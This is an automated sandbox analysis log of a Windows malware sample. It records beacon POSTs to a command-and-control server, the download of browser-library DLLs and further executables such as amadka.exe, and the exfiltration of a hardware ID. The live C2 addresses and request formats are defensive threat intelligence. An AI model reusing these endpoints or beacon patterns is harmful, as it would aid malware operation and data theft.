                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: Joe Sandbox ViewIP Address: 77.91.77.81 77.91.77.81
                        Source: Joe Sandbox ViewIP Address: 77.91.77.82 77.91.77.82
                        Source: Joe Sandbox ViewASN Name: GES-ASRU GES-ASRU
                        Source: Joe Sandbox ViewASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: unknownTCP traffic detected without corresponding DNS query: 85.28.47.30
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 12_2_0019BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,12_2_0019BD30
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
                        Source: unknownHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 39 31 37 45 39 36 37 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 2d 2d 0d 0a Data Ascii: ------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="hwid"66917E967D213859137049------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="build"Nice------HIIDGCGCBFBAKFHIJDBA--
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exe
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exe00
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exeData
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe-Disposition:
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe00
                        Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exeQ
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.2879968817.0000000001529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php#
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php-
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php40971b6b
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php8.
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php9
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpG
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpZ
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpq)
                        Source: explorti.exe, 0000000C.00000002.2879968817.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpt.
                        Source: file.exe, 00000000.00000002.1822925903.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30
                        Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/freebl3.dll
                        Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dll
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dllhg
                        Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/msvcp140.dll
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dll
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dlldf
                        Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll
                        Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll=
                        Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/sqlite3.dll
                        Source: file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll
                        Source: file.exe, 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/920475a59bac849d.php
                        Source: file.exe, 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.30/920475a59bac849d.phpI
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: file.exeString found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
                        Source: file.exeString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
                        Source: file.exeString found in binary or memory: http://pki-ocsp.symauth.com0
                        Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: file.exe, file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868672282.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecop
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecopnacl
                        Source: CFIEGDAE.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                        Source: CFIEGDAE.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: CFIEGDAE.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, CFIEGDAE.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: FCAAEHJDBKJJKFHJEBKF.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                        Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.drString found in binary or memory: https://support.mozilla.org
                        Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1703015007.00000000229CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                        Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1703015007.00000000229CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: file.exe, 00000000.00000002.1818332466.00000000005FA000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: CFIEGDAE.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000147A000.00000004.00000020.00020000.00000000.sdmp, FCAAEHJDBKJJKFHJEBKF.0.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                        Source: CFIEGDAE.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.drString found in binary or memory: https://www.mozilla.org
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/dHh0
                        Source: HDAFBGIJKEGIECAAFHDHDGCBFC.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: file.exe, 00000000.00000002.1818332466.00000000004F8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
